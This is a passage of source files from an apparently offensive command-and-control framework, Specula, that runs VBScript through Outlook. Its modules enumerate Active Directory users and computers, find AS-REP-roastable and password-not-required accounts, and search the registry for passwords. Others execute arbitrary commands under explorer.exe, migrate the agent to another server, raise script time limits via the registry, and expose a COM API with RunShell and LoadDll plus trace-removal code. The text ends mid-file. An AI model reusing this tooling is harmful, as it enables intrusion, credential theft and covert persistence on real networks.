9 | Lists interesting registry values that might be passwords 10 | or other interesting configuration settings 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).EnumValues 19 | - ConnectServer(root\cimv2).GetDwordValue 20 | - ConnectServer(root\cimv2).GetStringValue 21 | - ConnectServer(root\cimv2).GetExpandedStringValue 22 | - ConnectServer(root\cimv2).GetBinaryValue 23 | - ConnectServer(root\cimv2).GetMultiStringValue 24 | - ConnectServer(root\cimv2).GetQWORDValue 25 | """ 26 | self.entry = 'list_environmentvariables' 27 | self.depends = ['./helperFunctions/Getallregvalues.txt'] 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /ssl/ssl-cert-snakeoil.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDBzCCAe+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV 3 | BAMMHGlwLTE3Mi0zMS04MC0zNS5lYzIuaW50ZXJuYWwwHhcNMjAwNTEyMDkzMzAw 4 | WhcNMzAwNTEwMDkzMzAwWjAnMSUwIwYDVQQDDBxpcC0xNzItMzEtODAtMzUuZWMy 5 | LmludGVybmFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr5htMoRH 6 | u3XzftnuuPyrzs9c39zRyuNPsvf91c6HlNXSB9zprVZ2fHj9axS/WpOErlj+PHIT 7 | SpFaQqW8q5Pdb0fvlXGxC56SKf+08YiHZo8otsK7N2NYXSxLjpQZ9MTpeVxqFH6F 8 | 3NDedPV3oYxXI9q8+ZfFiRQPUnulmj4DspVYno49z1hSjcOBYoP3FVpTjldUWigm 9 | mTzr/udYufwIgMDGECCr8ZKIAhrCACLYNH8HrY9w2QtDETkdnhcK9EmazYCH9tRV 10 | nTCQSNhnu5kS2VLw39+cziVFt8XgsRQPpVfBTvGFRuts5wX82Gv8HMlrvcR3PHph 11 | LTE3j+qE4OsA+QIDAQABozYwNDAJBgNVHRMEAjAAMCcGA1UdEQQgMB6CHGlwLTE3 12 | Mi0zMS04MC0zNS5lYzIuaW50ZXJuYWwwDQYJKoZIhvcNAQELBQADggEBAKfPxE2n 13 | tax6bUvxNUIMJzbgmjNSxIzuqpnobc2CFx9NqEd9TMZ+x2Hgk+nnboOb+W6KYG7h 14 | RNFdNeb/MVDt3qieqsW6Ud2yqeW+2k9ZwrhwBIFsZP4NbjevShYk78WCu/gtM+Wt 15 | +0frvciSnYklFFtadoWuUPjQbETgsjvxjB6O+lLXQyPgARp2ZvgKLdNybslSPOHf 16 | 
h//Tg4nBcUwthFlsUFxVpg2aoopFwLfm4sgcC5fWAfK7sa3qHK6z8WPFoK+xyzbb 17 | CnAMMsXwBv6+K2abHx+LhNYr3+lMgfO6zyK0b4gLemOdtcC730cO7hK/7ByG4xuJ 18 | ZWTkYNIoVy3/BOU= 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computer.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the computer specified in the samaccountName option. 11 | If computer account is found it also enumerates the properties of the account. 12 | If account not found it will say so in the returned data. 13 | 14 | Remember to specify with $ in the end. 15 | Like: set samaccountname dc1$ 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(\\root\\directory\\LDAP) 19 | - Query: SELECT * FROM ds_computer Where DS_sAMAccountName = VARIABLE 20 | """ 21 | self.entry = 'list_computer' 22 | self.depends = [] 23 | self.options['samaccountname'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "samaccountname to retreive information for", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) 30 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_whoami.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Whoami with limited information. 
Missing privileges since there is no way to get 10 | that without API access or running external binaries 11 | 12 | It uses CreateObject("Wscript.Shell") 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\directory\LDAP) 15 | - Query: "SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'" 16 | 17 | - ConnectServer(root\cimv2) 18 | - Query: "SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'" 19 | """ 20 | self.entry = 'list_whoami' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | 24 | def rethandler(self, agent, options, data): 25 | for line in data.split("\n"): 26 | if line.startswith("SID:"): 27 | sid = line.split()[1] 28 | if sid: 29 | agent.sid = sid -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_addcomputertodomain.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates ms-DS-MachineAccountQuota from LDAP and finds the SeMachineAccountPrivilege in the default domain controller policy 11 | under the static path (GUID is always static for the default domain controller policy): 12 | \\\\domain.com\\Sysvol\\domain.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(\\root\\directory\\LDAP) 16 | - Query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns 17 | 18 | It uses Wscript.Shell 19 | - ExpandEnvironmentStrings 20 | 21 | It uses Scripting.FileSystemObject 22 | - OpenTextFile 23 | - OpenTextFile().readline 24 | - FileExists 25 | """ 26 | self.entry = 'list_addcomputertodomain' 27 | self.depends = [] 28 | 
super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/ldap/ldap_query.txt: -------------------------------------------------------------------------------- 1 | Function ldap_query() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & {{query}} & vbCrLf 7 | Set colItems = objWMIService.ExecQuery({{query}}) 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 
19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | ldap_query = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_localadmins.txt: -------------------------------------------------------------------------------- 1 | Function list_localadmins() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer({{host}}, "root\cimv2") 4 | Set colItems1 = objWMIService.ExecQuery( "Select * from Win32_ComputerSystem") 5 | For each objItem in colItems1 6 | MachineName = objItem.Name 7 | Next 8 | 9 | toreturn = toreturn & "Administrators Group Membership on Machine : " & MachineName & vbCrLf 10 | toreturn = toreturn & "-----Group Members------" & vbCrLf 11 | Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_GroupUser WHERE GroupComponent=""Win32_Group.Domain='" & MachineName & "',Name='Administrators'""") 12 | 13 | For Each Path In colItems2 14 | NamesArray = Split(Path.PartComponent,",") 15 | strMemberName = Replace(Replace(NamesArray(1),Chr(34),""),"Name=","") 16 | DomainNameArray = Split(NamesArray(0),"=") 17 | strDomainName = Replace(DomainNameArray(1),Chr(34),"") 18 | If strDomainName <> strComputerName Then 19 | strMemberName = strDomainName & "\" & strMemberName 20 | End If 21 | toreturn = toreturn & strMemberName & vbCrLf 22 | Next 23 | 24 | list_localadmins = toreturn & vbCrLf 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_iprouting.txt: -------------------------------------------------------------------------------- 1 | Function list_iprouting() 2 | On error resume next 3 | Set objLocator = 
window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_IP4RouteTable",,48) 6 | 7 | list_iprouting = "----- DYNAMIC ROUTES -----" & vbCrlf 8 | For Each objItem in colItems 9 | list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf 10 | list_iprouting = list_iprouting & "Interface Index: " & objItem.InterfaceIndex & vbCrlf 11 | list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf 12 | list_iprouting = list_iprouting & "Protocol: " & objItem.Protocol & vbCrlf & vbCrlf 13 | Next 14 | 15 | list_iprouting = list_iprouting & "----- PERSISTENT ROUTES -----" & vbCrlf 16 | Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_IP4PersistedRouteTable",,48) 17 | For Each objItem in colItems2 18 | list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf 19 | list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf 20 | Next 21 | End Function -------------------------------------------------------------------------------- /helperFunctions/HexToBytes.txt: -------------------------------------------------------------------------------- 1 | Function HexToBytes(HexString)' As Byte() 2 | Dim Bytes()' As Byte 3 | Dim HexPos' As Integer 4 | Dim HexDigit' As Integer 5 | Dim BytePos' As Integer 6 | Dim Digits' As Integer 7 | 8 | ReDim Bytes(Len(HexString) \ 2) 'Initial estimate. 
9 | For HexPos = 1 To Len(HexString) 10 | HexDigit = InStr("0123456789ABCDEF", UCase(Mid(HexString, HexPos, 1))) - 1 11 | If HexDigit >= 0 Then 12 | If BytePos > UBound(Bytes) Then 13 | 'Add some room, we'll add room for 4 more to decrease 14 | 'how often we end up doing this expensive step: 15 | ReDim Preserve Bytes(UBound(Bytes) + 4) 16 | End If 17 | Bytes(BytePos) = Bytes(BytePos) * &H10 + HexDigit 18 | Digits = Digits + 1 19 | End If 20 | If Digits = 2 Or HexDigit < 0 Then 21 | If Digits > 0 Then BytePos = BytePos + 1 22 | Digits = 0 23 | End If 24 | Next 25 | If Digits = 0 Then BytePos = BytePos - 1 26 | If BytePos < 0 Then 27 | Bytes = "" 'Empty. 28 | Else 29 | ReDim Preserve Bytes(BytePos) 30 | End If 31 | 'Wscript.Echo (Bytes)) 32 | HexToBytes = Bytes 33 | End Function 34 | 35 | 36 | -------------------------------------------------------------------------------- /functions/execute/host/spawnproc_explorer.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Spawns/Executes the specified process/command under explorer.exe. 11 | Example: 12 | set command c:\\tools\\autoruns.exe 13 | set arguments -e 14 | run 15 | 16 | It uses Shell.Application 17 | - Windows.app.item() 18 | - Windows.app.item().Document.Application.ShellExecute 19 | """ 20 | self.entry = 'Spawn_Explorer' 21 | self.depends = [] 22 | self.options['command'] = { 23 | "value": None, 24 | "required": True, 25 | "description": "Command to execute on remote target", 26 | "handler": quotedstring 27 | } 28 | self.options['arguments'] = { 29 | "value": "\"\"", 30 | "required": True, 31 | "description": "Arguments to pass to command. 
Default is no arguments", 32 | "handler": quotedstring 33 | } 34 | super().__init__(templatepath) 35 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_notifications.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Lists out current notification settings. 11 | If you get all failed in the agent log it means that it is set to default (Notifications,sounds and toasts are on) 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add 15 | - Add.__ProviderArchitecture 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).EnumValues 20 | - ConnectServer(root\cimv2).GetDwordValue 21 | - ConnectServer(root\cimv2).GetStringValue 22 | - ConnectServer(root\cimv2).GetExpandedStringValue 23 | - ConnectServer(root\cimv2).GetBinaryValue 24 | - ConnectServer(root\cimv2).GetMultiStringValue 25 | - ConnectServer(root\cimv2).GetQWORDValue 26 | """ 27 | self.entry = 'list_notifications' 28 | self.depends = ['./helperFunctions/Getregvalue.txt'] 29 | 30 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/registry/delvaluehkcuregistry.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes registry key in the HKCU hive specified in the PathToKey option recursivly. 
10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).DeleteValue 14 | """ 15 | self.entry = 'DelValue_HKCU_Registry' 16 | self.depends = ['./helperFunctions/Delregvalue_hkcu.txt'] 17 | self.options['PathToKey'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to the key you were the value is located. Example: Software\\EvilCorp\\subkey", 21 | "handler": quotedstring 22 | } 23 | self.options['Valuename'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Valuename to the value you would like to delete. Example: URL", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) 30 | -------------------------------------------------------------------------------- /api/SpeculaApi/Sepcula.h: -------------------------------------------------------------------------------- 1 | // Sepcula.h : Declaration of the CSepcula 2 | 3 | #pragma once 4 | #include "resource.h" // main symbols 5 | 6 | 7 | 8 | #include "SpeculaApi_i.h" 9 | 10 | 11 | 12 | using namespace ATL; 13 | 14 | 15 | // CSepcula 16 | 17 | class ATL_NO_VTABLE CSepcula : 18 | public CComObjectRootEx, 19 | public CComCoClass, 20 | public IDispatchImpl 21 | { 22 | public: 23 | CSepcula() 24 | { 25 | } 26 | 27 | DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA) 28 | 29 | 30 | BEGIN_COM_MAP(CSepcula) 31 | COM_INTERFACE_ENTRY(ISepcula) 32 | COM_INTERFACE_ENTRY(IDispatch) 33 | END_COM_MAP() 34 | 35 | 36 | 37 | DECLARE_PROTECT_FINAL_CONSTRUCT() 38 | 39 | HRESULT FinalConstruct() 40 | { 41 | return S_OK; 42 | } 43 | 44 | void FinalRelease() 45 | { 46 | } 47 | 48 | public: 49 | STDMETHOD(RunShell)(BSTR cmd, VARIANT timeout, BSTR * result); 50 | STDMETHOD(LoadDll)(BSTR path, boolean persist, boolean* status); 51 | 52 | 53 | private: 54 | CComBSTR CmdProg{L"C:\\Windows\\system32\\cmd.exe /c "}; 55 | 56 | 57 | 58 | }; 59 | 60 | OBJECT_ENTRY_AUTO(__uuidof(Sepcula), CSepcula) 61 | 
-------------------------------------------------------------------------------- /functions/enumerate/host/list_servicepermissions.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the services and the permissions on the host. 10 | 11 | It lists out: 12 | - Service Name 13 | - Service Binary path 14 | - Group name and Access 15 | 16 | Example Output: 17 | Enumerating Permissions for: UserDataSvc_3dc16 18 | C:\Windows\system32\svchost.exe 19 | GROUP: NT SERVICE\TRUSTEDINSTALLER 20 | binPath: C:\Windows\system32\svchost.exe 21 | Sanity Check - Access Mask Value To Match: 2032127 22 | ACE Type: Allow 23 | Access Mask (Decimal): 2032127 (FullControl) 24 | 25 | It uses WbemScripting.SWbemLocator 26 | - ConnectServer(root\cimv2) 27 | - Query: Select * from Win32_Service 28 | - Query: Select * from win32_logicalFileSecuritySetting WHERE Path=VARIABLE 29 | """ 30 | self.entry = 'list_servicepermissions' 31 | self.depends = [] 32 | super().__init__(templatepath) 33 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installeddotnet.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed .NET versions. 
10 | Based on MS documentation: 11 | https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed 12 | 13 | Lists the installed versions 14 | 15 | It uses WbemScripting.SWbemNamedValueSet 16 | - Add 17 | - Add.__ProviderArchitecture 18 | 19 | It uses WbemScripting.SWbemLocator 20 | - ConnectServer(root\cimv2) 21 | - ConnectServer(root\cimv2).EnumValues 22 | - ConnectServer(root\cimv2).GetDwordValue 23 | - ConnectServer(root\cimv2).GetStringValue 24 | - ConnectServer(root\cimv2).GetExpandedStringValue 25 | - ConnectServer(root\cimv2).GetBinaryValue 26 | - ConnectServer(root\cimv2).GetMultiStringValue 27 | - ConnectServer(root\cimv2).GetQWORDValue 28 | """ 29 | self.entry = 'list_installeddotnet' 30 | self.depends = ['./helperFunctions/Getregvalue.txt'] 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_domaininfo.txt: -------------------------------------------------------------------------------- 1 | Function list_domaininfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: SELECT * FROM ds_domaindns" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_domaindns") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 
19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_domaininfo = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/execute/host/migrate_homepage.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Migrate agent to another Specula server. 11 | This module sets the URL to a new Specula server. 12 | Useful in situations when you want to change host. 13 | It does NOT move the encrytion key so you must point to the validation url. 14 | !!Remember to have the other server up and running!! 
15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).CreateKey 19 | - ConnectServer(root\cimv2).SetStringValue 20 | - ConnectServer(root\cimv2).SetDWORDValue 21 | """ 22 | self.entry = 'Execute_MigrateHomepage' 23 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 24 | self.options['homepageurl'] = { 25 | "value": None, 26 | "required": True, 27 | "description": "URL to new Specula Homepage validation", 28 | "handler": quotedstring 29 | } 30 | super().__init__(templatepath) 31 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_users.txt: -------------------------------------------------------------------------------- 1 | Function list_users() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_user" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_user") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 
19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_users = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/set_allowlongscriptruntime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | import uuid 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module sets necessary registry keys to allow long running scripts such as list_dir running recurse or service acl enumeration. 11 | 12 | The following value changes the default timeout for scripts running in Outlook and is being set with this module: 13 | reg add "HKCU\Software\Microsoft\Internet Explorer\Styles" /v "MaxScriptStatements" /t REG_DWORD /d 0xFFFFFFFF /f 14 | 15 | ! After setting this key, Outlook needs to be restarted for it to take effect ! 
16 | 17 | It uses WbemScripting.SWbemNamedValueSet 18 | - Add.__ProviderArchitecture 19 | 20 | It uses WbemScripting.SWbemLocator 21 | ConnectServer(root\cimv2) 22 | ConnectServer(root\cimv2).CreateKey 23 | ConnectServer(root\cimv2).SetDWORDValue 24 | """ 25 | self.entry = 'AllowLongScriptRuntime' 26 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 27 | 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_localusers.txt: -------------------------------------------------------------------------------- 1 | Function list_localusers() 2 | on error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | compname = sh.ExpandEnvironmentStrings("%COMPUTERNAME%") 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 7 | 8 | toreturn = toreturn & "Local users on Machine " & compname & " : " & vbCrLf 9 | Set colUsers = objWMIService.ExecQuery("SELECT * FROM Win32_UserAccount WHERE LocalAccount = True") 10 | For Each objUser in colUsers 11 | toreturn = toreturn & objUser.Name & vbCrLf 12 | toreturn = toreturn & "--Description: " & objUser.Description & vbCrLf 13 | toreturn = toreturn & "--Disabled: " & objUser.Disabled & vbCrLf 14 | toreturn = toreturn & "--FullName: " & objUser.FullName & vbCrLf 15 | toreturn = toreturn & "--Lockout: " & objUser.Lockout & vbCrLf 16 | toreturn = toreturn & "--PasswordChangeable: " & objUser.PasswordChangeable & vbCrLf 17 | toreturn = toreturn & "--PasswordExpires: " & objUser.PasswordExpires & vbCrLf 18 | toreturn = toreturn & "--PasswordRequired: " & objUser.PasswordRequired & vbCrLf 19 | toreturn = toreturn & vbCrLf 20 | Next 21 | list_localusers = toreturn 22 | End Function -------------------------------------------------------------------------------- 
/functions/enumerate/ldap/list_asreproast.txt: -------------------------------------------------------------------------------- 1 | Function list_asreproast() 2 | On error resume next 3 | 4 | Const DONT_REQUIRE_PREAUTH = 4194304 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 7 | 8 | Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304" & vbCrLf 9 | Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304") 10 | For Each PATH in colItems 11 | For Each pathAttribute in PATH.Properties_ 12 | Select Case TypeName(pathAttribute.value) 13 | case "Long" 14 | if DONT_REQUIRE_PREAUTH and pathAttribute.value Then 15 | Returndata = Returndata & PATH.ADSIPath & vbCrLf 16 | Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf 17 | Returndata = Returndata & "DONT_REQUIRE_PREAUTH enabled" & vbCrLf 18 | Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf 19 | Returndata = Returndata & vbCrLf 20 | end if 21 | End Select 22 | Next 23 | Next 24 | list_asreproast = Returndata 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordnotrequired.txt: -------------------------------------------------------------------------------- 1 | Function list_passwordnotrequired() 2 | On error resume next 3 | 4 | Const PASSWD_NOTREQD = 32 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 7 | 8 | Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl 
>= 32" & vbCrLf 9 | Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32") 10 | For Each PATH in colItems 11 | For Each pathAttribute in PATH.Properties_ 12 | Select Case TypeName(pathAttribute.value) 13 | case "Long" 14 | if PASSWD_NOTREQD and pathAttribute.value Then 15 | Returndata = Returndata & PATH.ADSIPath & vbCrLf 16 | Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf 17 | Returndata = Returndata & "PASSWD_NOTREQD enabled" & vbCrLf 18 | Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf 19 | Returndata = Returndata & vbCrLf 20 | end if 21 | End Select 22 | Next 23 | Next 24 | list_passwordnotrequired = Returndata 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computers.txt: -------------------------------------------------------------------------------- 1 | Function list_computers() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_computer" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_computer") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 
19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_computers = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/api/remove_api.txt: -------------------------------------------------------------------------------- 1 | 2 | Function remove_api() 3 | On error resume next 4 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 5 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 6 | basepath = "software\classes\" 7 | 8 | regdelres = DelRegKey_HKCU(basepath + "OutLookHelper.Sysinfo") & vbCrlf 9 | regdelres = regdelres & DelRegKey_HKCU(basepath + "SpeculaApi.Specula.1") & vbCrlf 10 | regdelres = regdelres & DelRegKey_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf 11 | regdelres = regdelres & DelRegKey_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrlf 12 | regdelres = regdelres & DelRegKey_HKCU(basepath + "Interface\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf 13 | 14 | if {{deletedlls}} = True Then 15 | 16 | If fs.FileExists({{dll}}) = True Then 17 | fs.DeleteFile {{dll}} 18 | else 19 | End If 20 | 21 | If fs.FileExists({{dll}}) = True Then 22 | filedelres = filedelres & "Delete file: " & {{dll}} & " - Fail" & vbCrlf 23 | else 24 | filedelres = filedelres & "Delete file: " & {{dll}} & " - Success!" 
